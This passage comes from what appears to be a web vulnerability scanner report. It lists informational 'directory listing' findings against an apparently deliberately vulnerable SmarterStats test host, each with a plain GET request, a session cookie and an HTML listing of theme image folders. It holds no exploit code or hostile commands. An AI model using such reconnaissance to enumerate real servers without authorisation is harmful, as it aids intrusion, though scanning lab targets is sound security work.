Thursday, October 07, 2010 01:00 PM 105 <A href="FE_topbar_tile.png">FE_topbar_tile.png</A>
Thursday, October 07, 2010 01:00 PM 2,197 <A href="FE_View.png">FE_View.png</A>
Thursday, October 07, 2010 01:00 PM 4,439 <A href="LiveChatOffline.PNG">LiveChatOffline.PNG</A>
Thursday, October 07, 2010 01:00 PM 3,537 <A href="LiveChatOnline.PNG">LiveChatOnline.PNG</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Pager/">Pager</A>
Thursday, October 07, 2010 01:00 PM 1,009 <A href="RssFeedLogo.gif">RssFeedLogo.gif</A>
Thursday, October 07, 2010 01:00 PM 1,072 <A href="Send.gif">Send.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.48. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Customer/Pager/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/Customer/Pager/

Request

GET /App_Themes/Default/images/Customer/Pager/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Customer/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:55 GMT
Content-Length: 2842
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/Customer/Pager/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/Customer/Pager/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/Customer/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 179 <A href="doubleArrow_L.gif">doubleArrow_L.gif</A>
Thursday, October 07, 2010 01:00 PM 179 <A href="doubleArrow_L_disabled.gif">doubleArrow_L_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 177 <A href="doubleArrow_R.gif">doubleArrow_R.gif</A>
Thursday, October 07, 2010 01:00 PM 177 <A href="doubleArrow_R_disabled.gif">doubleArrow_R_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 51 <A href="downState.gif">downState.gif</A>
Thursday, October 07, 2010 01:00 PM 183 <A href="endArrow_L.gif">endArrow_L.gif</A>
Thursday, October 07, 2010 01:00 PM 183 <A href="endArrow_L_disabled.gif">endArrow_L_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 181 <A href="endArrow_R.gif">endArrow_R.gif</A>
Thursday, October 07, 2010 01:00 PM 181 <A href="endArrow_R_disabled.gif">endArrow_R_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 66 <A href="hoverState.gif">hoverState.gif</A>
Thursday, October 07, 2010 01:00 PM 162 <A href="singleArrow_L.gif">singleArrow_L.gif</A>
Thursday, October 07, 2010 01:00 PM 162 <A href="singleArrow_L_disabled.gif">singleArrow_L_disabled.gif</A>
Thursday, October 07, 2010 01:00 PM 162 <A href="singleArrow_R.gif">singleArrow_R.gif</A>
Thursday, October 07, 2010 01:00 PM 162 <A href="singleArrow_R_disabled.gif">singleArrow_R_disabled.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.49. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Invitations/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/Invitations/

Request

GET /App_Themes/Default/images/Invitations/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:56 GMT
Content-Length: 3305
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/Invitations/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/Invitations/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 4,671 <A href="AgentIcon.gif">AgentIcon.gif</A>
Thursday, October 07, 2010 01:00 PM 554 <A href="BtmLeftShadow_1.gif">BtmLeftShadow_1.gif</A>
Thursday, October 07, 2010 01:00 PM 697 <A href="BtmLeftShadow_2.gif">BtmLeftShadow_2.gif</A>
Thursday, October 07, 2010 01:00 PM 363 <A href="BtmLeftShadow_Corner.gif">BtmLeftShadow_Corner.gif</A>
Thursday, October 07, 2010 01:00 PM 155 <A href="BtmLeftShadow_Tile.gif">BtmLeftShadow_Tile.gif</A>
Thursday, October 07, 2010 01:00 PM 533 <A href="BtmRightShadow_1.gif">BtmRightShadow_1.gif</A>
Thursday, October 07, 2010 01:00 PM 437 <A href="BtmRightShadow_2.gif">BtmRightShadow_2.gif</A>
Thursday, October 07, 2010 01:00 PM 420 <A href="BtmRightShadow_Corner.gif">BtmRightShadow_Corner.gif</A>
Thursday, October 07, 2010 01:00 PM 154 <A href="BtmRightShadow_Tile.gif">BtmRightShadow_Tile.gif</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="Button/">Button</A>
Thursday, October 07, 2010 01:00 PM 354 <A href="LeftShadow_1.gif">LeftShadow_1.gif</A>
Thursday, October 07, 2010 01:00 PM 244 <A href="LeftShadow_2.gif">LeftShadow_2.gif</A>
Thursday, October 07, 2010 01:00 PM 292 <A href="LeftShadow_3.gif">LeftShadow_3.gif</A>
Thursday, October 07, 2010 01:00 PM 368 <A href="RightShadow_1.gif">RightShadow_1.gif</A>
Thursday, October 07, 2010 01:00 PM 252 <A href="RightShadow_2.gif">RightShadow_2.gif</A>
Thursday, October 07, 2010 01:00 PM 343 <A href="RightShadow_3.gif">RightShadow_3.gif</A>
Thursday, October 07, 2010 01:00 PM 253 <A href="RightShadow_4.gif">RightShadow_4.gif</A>
Thursday, October 07, 2010 01:00 PM 1,273 <A href="WMAlert.gif">WMAlert.gif</A>
Thursday, October 07, 2010 01:00 PM 1,439 <A href="WMConfirmation.gif">WMConfirmation.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.50. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Invitations/Button/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/Invitations/Button/

Request

GET /App_Themes/Default/images/Invitations/Button/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Invitations/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:57 GMT
Content-Length: 2415
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/Invitations/Button/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/Invitations/Button/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/Invitations/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 162 <A href="Arrow.gif">Arrow.gif</A>
Thursday, October 07, 2010 01:00 PM 212 <A href="Button_LeftCap.gif">Button_LeftCap.gif</A>
Thursday, October 07, 2010 01:00 PM 848 <A href="Button_RightCap.gif">Button_RightCap.gif</A>
Thursday, October 07, 2010 01:00 PM 157 <A href="Button_Tile.gif">Button_Tile.gif</A>
Thursday, October 07, 2010 01:00 PM 105 <A href="StartBtn_LeftCap.gif">StartBtn_LeftCap.gif</A>
Thursday, October 07, 2010 01:00 PM 104 <A href="StartBtn_LeftCap_Over.gif">StartBtn_LeftCap_Over.gif</A>
Thursday, October 07, 2010 01:00 PM 105 <A href="StartBtn_RightCap.gif">StartBtn_RightCap.gif</A>
Thursday, October 07, 2010 01:00 PM 104 <A href="StartBtn_RightCap_Over.gif">StartBtn_RightCap_Over.gif</A>
Thursday, October 07, 2010 01:00 PM 95 <A href="StartBtn_Tile.gif">StartBtn_Tile.gif</A>
Thursday, October 07, 2010 01:00 PM 94 <A href="StartBtn_Tile_Over.gif">StartBtn_Tile_Over.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.51. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/Plupload/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/Plupload/

Request

GET /App_Themes/Default/images/Plupload/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:58 GMT
Content-Length: 2055
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/Plupload/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/Plupload/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 2,977 <A href="backgrounds.gif">backgrounds.gif</A>
Thursday, October 07, 2010 01:00 PM 1,252 <A href="buttons-disabled.png">buttons-disabled.png</A>
Thursday, October 07, 2010 01:00 PM 1,400 <A href="buttons.png">buttons.png</A>
Thursday, October 07, 2010 01:00 PM 180 <A href="delete.gif">delete.gif</A>
Thursday, October 07, 2010 01:00 PM 1,024 <A href="done.gif">done.gif</A>
Thursday, October 07, 2010 01:00 PM 994 <A href="error.gif">error.gif</A>
Thursday, October 07, 2010 01:00 PM 1,922 <A href="throbber.gif">throbber.gif</A>
Thursday, October 07, 2010 01:00 PM 325 <A href="transp50.png">transp50.png</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.52. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/icons/

Request

GET /App_Themes/Default/images/icons/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:46 GMT
Content-Length: 1996
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/icons/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 896 <A href="Button_Tile.png">Button_Tile.png</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="DragDrop/">DragDrop</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="IconMenu/">IconMenu</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="IconMenuInternal/">IconMenuInternal</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="IconMenuStats/">IconMenuStats</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="IconMenuTrack/">IconMenuTrack</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="MessageView/">MessageView</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.53. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/DragDrop/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/icons/DragDrop/

Request

GET /App_Themes/Default/images/icons/DragDrop/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:46 GMT
Content-Length: 1509
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/DragDrop/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/icons/DragDrop/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/icons/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 1,449 <A href="Failure.png">Failure.png</A>
Thursday, October 07, 2010 01:00 PM 821 <A href="Success.png">Success.png</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.54. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/IconMenuInternal/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/icons/IconMenuInternal/

Request

GET /App_Themes/Default/images/icons/IconMenuInternal/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:47 GMT
Content-Length: 1723
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/IconMenuInternal/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/icons/IconMenuInternal/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/icons/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 4,183 <A href="Hover.png">Hover.png</A>
Thursday, October 07, 2010 01:00 PM 6,540 <A href="Selected.png">Selected.png</A>
Thursday, October 07, 2010 01:00 PM 6,479 <A href="SelectedHover.png">SelectedHover.png</A>
Thursday, October 07, 2010 01:00 PM 3,561 <A href="Unselected.png">Unselected.png</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.55. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/IconMenuTrack/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/icons/IconMenuTrack/

Request

GET /App_Themes/Default/images/icons/IconMenuTrack/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:47 GMT
Content-Length: 1717
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/IconMenuTrack/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/icons/IconMenuTrack/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/icons/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 3,269 <A href="Hover.png">Hover.png</A>
Thursday, October 07, 2010 01:00 PM 5,392 <A href="Selected.png">Selected.png</A>
Thursday, October 07, 2010 01:00 PM 5,546 <A href="SelectedHover.png">SelectedHover.png</A>
Thursday, October 07, 2010 01:00 PM 2,586 <A href="Unselected.png">Unselected.png</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.56. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/MessageView/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/icons/MessageView/

Request

GET /App_Themes/Default/images/icons/MessageView/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:48 GMT
Content-Length: 2628
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/MessageView/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/icons/MessageView/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/icons/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 669 <A href="chat.gif">chat.gif</A>
Thursday, October 07, 2010 01:00 PM 155 <A href="contract.gif">contract.gif</A>
Thursday, October 07, 2010 01:00 PM 626 <A href="contractAll.gif">contractAll.gif</A>
Thursday, October 07, 2010 01:00 PM 657 <A href="delete.gif">delete.gif</A>
Thursday, October 07, 2010 01:00 PM 578 <A href="edit.gif">edit.gif</A>
Thursday, October 07, 2010 01:00 PM 605 <A href="email.gif">email.gif</A>
Thursday, October 07, 2010 01:00 PM 607 <A href="emailAttch.gif">emailAttch.gif</A>
Thursday, October 07, 2010 01:00 PM 154 <A href="expand.gif">expand.gif</A>
Thursday, October 07, 2010 01:00 PM 622 <A href="expandAll.gif">expandAll.gif</A>
Thursday, October 07, 2010 01:00 PM 6,273 <A href="MessageIcons.png">MessageIcons.png</A>
Thursday, October 07, 2010 01:00 PM 650 <A href="quoteReply.gif">quoteReply.gif</A>
Thursday, October 07, 2010 01:00 PM 686 <A href="rawContent.gif">rawContent.gif</A>
Saturday, October 09, 2010 10:27 PM &lt;dir&gt; <A href="rollover/">rollover</A>
Thursday, October 07, 2010 01:00 PM 608 <A href="unlink.gif">unlink.gif</A>
</PRE>
<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;SmarterTools Web Server 2.0.3932.23369

</font>

</body>
</html>

8.57. http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/MessageView/rollover/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /App_Themes/Default/images/icons/MessageView/rollover/

Request

GET /App_Themes/Default/images/icons/MessageView/rollover/ HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/App_Themes/Default/images/icons/MessageView/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 04:12:48 GMT
Content-Length: 2196
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/MessageView/rollover/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
   b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
   h1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
   h2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
   pre {font-family:"Lucida Console";font-size: 8pt}
   .marker {font-weight: bold; color: black;text-decoration: none;}
   .version {color: gray;}
   .error {margin-bottom: 10px;}
   .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>
<body bgcolor="white">

<h2> <i>Directory Listing -- /App_Themes/Default/images/icons/MessageView/rollover/</i> </h2></span>

<hr width=100% size=1 color=silver>

<PRE>
<A href="/App_Themes/Default/images/icons/MessageView/">[To Parent Directory]</A>

Thursday, October 07, 2010 01:00 PM 190 <A href="contract.gif">contract.gif</A>
Thursday, October 07, 2010 01:00 PM 662 <A href="contractAll.gif">contractAll.gif</A>
Thursday, October 07, 2010 01:00 PM 716 <A href="delete.gif">delete.gif</A>
Thursday, October 07, 2010 01:00 PM 635 <A href="edit.gif">edit.gif</A>
Thursday, October 07, 2010 01:00 PM 191 <A href="expand.gif">expand.gif</A>
Thursday, October 07, 2010 01:00 PM 654 <A href="expandAll.gif">expandAll.gif</A>
